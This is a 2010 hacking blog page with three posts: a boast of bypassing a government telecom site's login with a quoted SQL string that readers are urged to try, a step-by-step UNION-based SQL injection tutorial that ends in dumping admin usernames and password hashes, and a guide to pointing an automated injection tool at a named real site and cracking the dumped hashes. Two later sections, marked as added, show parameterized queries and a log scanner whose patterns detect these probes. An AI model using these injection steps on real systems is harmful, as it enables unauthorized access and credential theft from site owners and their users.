Arena of An Artist: vulnerability

Wednesday, December 8, 2010

BSNL website HACKED by Ashish :)

BSNL Hacked by Simple SQLi .. Never thought this much BIG Govt. site will be vulnerable to such a Chindi thing :P


http://www.topnews.in/files/BSNL-India-.jpg

See Yourself.. 

go here
LINK 1

or
 

LINK 2

simply Enter

' or '1'='1

In password field

and





ENJOY..!
 
NOTE: It is for educational Purpose Only

Saturday, October 30, 2010

SQL Injection Tutorial

SQL injection is a technique in which crafted input exploits a vulnerability in how a website queries its database.

Step 1

Firstly we will find a site which is vulnerable to SQLI.

So surf the site till you get to a URL which looks like this:

www . prateek . com/articles/index.php?id=213

By this I mean a URL ending with something like "php?id=213".

Now to check whether the site is vulnerable or not, we add a ' sign at the end of the URL.

Example => www . prateek . com/articles/index.php?id=213'

If we get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1" or similar, it means the site is vulnerable to SQLI.

Ok so now we will proceed to the next step

Step 2

Finding the number of columns: now we will find the number of columns with the ORDER BY command.

Example => www . prateek . com/articles/index.php?id=213 order by 10--

So here we added the number 10, assuming that there are 10 columns.
If the site does not have 10 columns it will give an error "Unknown column '10' in 'order clause'".
This means that the number of columns is less than 10, so we continue to test by decreasing the number.

Example => www . prateek . com/articles/index.php?id=213 order by 9--
www . prateek . com/articles/index.php?id=213 order by 8--
www . prateek . com/articles/index.php?id=213 order by 7--
www . prateek . com/articles/index.php?id=213 order by 6--
www . prateek . com/articles/index.php?id=213 order by 5--


Step 3

Now when we test it for 5 columns it does not give an error, and if we test it for 6 it gives an error, which means that the number of columns is 5.

So now that we know there are 5 columns, we will use the UNION ALL command.

Example =>
www . prateek . com/articles/index.php?id=213 union all select 1,2,3,4,5--

As there were 5 columns we selected all the 5 columns.

When we execute this URL then on the page there will be number(s) displayed.

Like 2 or 3 or 4 etc. (This will not be greater than the number of columns.)

Step 4

We have to remember the number which appeared, as we will use it in the next step.

Let us assume that number 3 appeared.

So now we will check the version of MYSQL with the help of this number

Example => www . prateek . com/articles/index.php?id=213 union all select 1,2,@@version,4,5--

We used the @@version variable to find out the version being used.

We replaced the number 3 (as we had got it in the last step) with @@version.

Now after executing this the version number will be displayed, like => 5.0.51a-community

Now as the version is above 5 it's fine.

Step 5

Now we will find the names of columns and tables.

This will be done by:

Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--

After executing this, the names of tables will be displayed.

It may be anything.

Note them down. (Choose names having admin, username, user etc. in them.)

Now we will find the names of columns

Example URL => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_schema=database()--

After executing this, the names of columns will be displayed.

It may be anything.

Note them down. (Choose names having password, username, pass etc. in them.)

You might think: what happens when you don't see a column like username or password?

Then you have to do a little guessing.

Step 6

Now we will move further.

And place the names of columns and tables we noted down in the URL.

Example => www . prateek . com/articles/index.php?id=213 union all select 1,2,group_concat(username,0x3a,password),4,5 from admin--

In the above URL, username is the column named username or user or admin etc. Similarly, password is also a column, and the end part, i.e. "from admin", names the table.

That's it. Execute the URL and you will get the password as a hash (most probably, but if you are lucky you can even get it in plain text).

Thanks for reading my tutorial hope you liked it.  
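The login string from the BSNL post and the "id=213" requests in this tutorial work for the same reason: the application builds its SQL text by concatenating user input. The following is an added example, not code from the original posts, that shows each flawed query beside its parameterized form. It uses Python's sqlite3 with a constructed schema in place of the PHP/MySQL site, and all table, column and function names are assumptions.

```python
import sqlite3

# Constructed in-memory data standing in for the site's database.
# The plaintext password column only mirrors the flawed login shape;
# real systems store salted hashes and verify them in application code.
db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT, created TEXT);
INSERT INTO articles VALUES (213, 'Hello', 'Body text', 'editor', '2010-10-30');
CREATE TABLE admin (username TEXT, password TEXT);
INSERT INTO admin VALUES ('admin', 'constructed-secret');
""")

def vulnerable_login(username, password):
    # Flawed: input is pasted into the SQL text, so a quote ends the string literal.
    sql = ("SELECT 1 FROM admin WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def safe_login(username, password):
    # Placeholders bind the values as data; they are never parsed as SQL.
    sql = "SELECT 1 FROM admin WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

def vulnerable_article(raw_id):
    # Flawed: the id is concatenated unquoted, so appended clauses join the query.
    return db.execute("SELECT * FROM articles WHERE id = " + raw_id).fetchall()

def safe_article(raw_id):
    # Check the expected type first, then bind the value as a parameter.
    try:
        article_id = int(raw_id)
    except ValueError:
        return []
    return db.execute("SELECT * FROM articles WHERE id = ?", (article_id,)).fetchall()

if __name__ == "__main__":
    bypass = "' or '1'='1"                      # string from the BSNL post
    union = "213 union all select 1,2,3,4,5--"  # string from Step 3
    print("login, concatenated :", vulnerable_login("admin", bypass))
    print("login, parameterized:", safe_login("admin", bypass))
    print("rows, concatenated  :", len(vulnerable_article(union)))
    print("rows, parameterized :", len(safe_article(union)))
```

With the parameterized forms the same strings are compared as plain values, so the login fails and the article lookup returns nothing.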

Saturday, April 24, 2010

How to hack websites using Auto SQL I Helper

To begin with, "SQLIHelperV.2.7" is a tool that will hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way into a website and trying hundreds of combinations and codes to hack a website.
This tool will do it all by itself. You only have to tell it what to do and where to look.


Let's start.
First you need to find a potential website that you think might be possible to hack. Remember that some websites are simply unhackable.

After you find your website (better if it ends with "article.php?id=[number]"), example: "http://encycl.anthropology.ru/article.php?id=1"

I will explain my tut on how to hack this website.

Check if your website can be hacked by trying to go to this address:

You should get this message:

Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

This means that this website can be hacked because you get an error.

Now open your SQL I Helper V.2.7
and write the link :

and press the inject button.

Now you should wait until the tool finishes searching for columns. Time may vary depending on your connection speed, your PC speed, and the number of columns in the website.


Make sure that the website supports union, otherwise the injection won't work.


Now select any element from the "database name" box and press the "Get tables" button

then select any element from the "table name" box and press the "Get columns" button

then select any elements you want from the "columns name" box and press "Dump Now"

After clicking "Dump Now", you will see some hashes.

Now copy the hash on a piece of paper and go to this website:

enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.
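The manual steps in the tutorial above, and the column search this tool runs, reach the site as ordinary HTTP requests, so they leave a recognisable trail in web server access logs. The following is an added example, not part of the original post, that scans log lines for those request shapes and groups the hits by client address. It assumes Combined Log Format; the sample lines and signature names are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Request shapes from the tutorial's steps, matched on the decoded query string.
SIGNATURES = {
    "quote_probe": re.compile(r"=\d+'$"),                               # Step 1
    "order_by_count": re.compile(r"\border\s+by\s+\d+", re.I),          # Step 2
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),   # Step 3
    "version_probe": re.compile(r"@@version", re.I),                    # Step 4
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),         # Step 5
}
# Combined Log Format prefix: client, identity, user, [time], "METHOD target PROTO"
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

# Constructed sample lines using documentation IP ranges, not from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Oct/2010:10:00:01 +0000] "GET /articles/index.php?id=213 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Oct/2010:10:00:05 +0000] "GET /articles/index.php?id=213%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [30/Oct/2010:10:00:09 +0000] "GET /articles/index.php?id=213%20order%20by%2010-- HTTP/1.1" 500 298',
    '203.0.113.9 - - [30/Oct/2010:10:00:31 +0000] "GET /articles/index.php?id=213+union+all+select+1,2,@@version,4,5-- HTTP/1.1" 200 5300',
    '198.51.100.7 - - [30/Oct/2010:10:01:02 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 2048',
]

def scan(lines):
    """Return {client_ip: sorted signature names seen in that client's query strings}."""
    hits = defaultdict(set)
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue  # skip lines that are not in the expected log format
        ip, target = match.groups()
        # Decode %xx and '+' so encoded and plain requests match the same pattern.
        query = unquote_plus(urlsplit(target).query)
        for name, pattern in SIGNATURES.items():
            if pattern.search(query):
                hits[ip].add(name)
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, names)
```

Signature matching of this kind is a triage aid for spotting scripted probing, not a control; the fix remains parameterized queries.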